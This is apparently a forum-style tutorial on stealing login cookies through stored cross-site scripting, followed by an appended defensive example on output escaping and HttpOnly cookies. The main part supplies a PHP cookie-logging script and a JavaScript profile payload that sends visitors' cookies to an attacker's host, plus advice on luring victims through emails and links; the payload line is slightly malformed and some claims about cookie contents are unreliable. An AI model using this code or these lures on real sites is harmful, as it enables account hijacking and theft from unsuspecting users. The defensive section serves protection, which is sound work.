Cookie stealing is one of the most fundamental aspects of XSS (cross-site scripting). Cookies are used to store valuable information such as username, password, IP address and much more, and that is why the cookie is so important. Cookie stealing is the process of getting and changing other people's cookies.
Go to a website that requires a login and, after logging in, erase everything in the address bar, type "javascript:alert(document.cookie)" and press enter. You should see a pop-up window with some information about your login details, like username, password, etc. The cookie may contain the password as a hash, but with some luck hashes can be cracked. Sometimes it is also possible to paste the hash into your own cookie at the right place and log in with the victim's account.
This does not mean that to get a victim's password you have to get him to sit down, log in and type the script that shows you the alert box. You have to be smart and use tricks. These tricking techniques are known as social engineering. All you have to do is fool the victim. For example, after he logs in, make him click on a page or link that contains the malicious script.
For cookie stealing, you first have to find the XSS vulnerability. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a profile option, etc. Most websites apply some sort of filter to input. XSS deals with finding weaknesses in those filters that let you put your own code into the website.
Example:
Get a free web host that supports PHP and make a new file. In the new file, type in this:
```php
<?php
// Append the value of the "cookie" query parameter to evil.txt, one per line.
$cookie = $_GET['cookie'] . "\n";
$fh = fopen('evil.txt', 'ab');
fwrite($fh, $cookie);
fclose($fh);
?>
```
Save it as evil.php. Now make an empty text file named evil.txt.
Let's assume that we have a website that has a user login as well as a profile option and does no filtering at all. This means that you can put HTML and JavaScript in your profile. Suppose you write the following code in your profile:
```javascript
document.location=http://yourwebsite.com/evil.php?cookie=document.cookie
```
Whenever someone views your profile, they will be redirected to your script with their cookie in the URL. If you looked at evil.txt now, you would see the victim's cookie.
You can steal the cookie of a victim's mail account by simply sending the victim an e-mail that contains a link to the script. If the victim clicks the link, you get the information stored in his cookie. You can also hide the script in an image.
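The two server-side defences that break this flow, as an added example in plain Node-style JavaScript (not code from the original post): output-encode profile text so a stored script never executes, and mark the session cookie HttpOnly so `document.cookie` cannot read it even if a script does run. The function names, the sample bio and the session-id format are constructed for this example.

```javascript
// Added example, not from the original post.

// 1. Output encoding: profile text is rendered as inert text, so a stored
//    <script> payload is displayed rather than executed in a viewer's browser.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderProfile(username, bio) {
  // Every user-controlled value goes through escapeHtml before it reaches the page.
  return `<h1>${escapeHtml(username)}</h1><p>${escapeHtml(bio)}</p>`;
}

// 2. Cookie attributes: HttpOnly keeps the session id out of document.cookie,
//    Secure restricts it to HTTPS, SameSite=Lax limits cross-site sending.
function sessionCookieHeader(sessionId) {
  // Assumed format for this example: opaque URL-safe token of at least 16 chars.
  if (!/^[A-Za-z0-9_-]{16,}$/.test(sessionId)) throw new Error('unexpected session id format');
  return `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Defender check: given the Set-Cookie headers a server sends, return what
// document.cookie would expose to page script. Browsers hide HttpOnly cookies
// from script, so an injected alert(document.cookie) would not show the session.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0].trim());
}

// Constructed sample: a profile bio carrying the alert payload from the post above.
const SAMPLE_BIO = '<script>alert(document.cookie)</script>';

console.log(renderProfile('bob', SAMPLE_BIO));
console.log(scriptVisibleCookies([sessionCookieHeader('abcdefghijklmnop'), 'theme=dark; Path=/']));
```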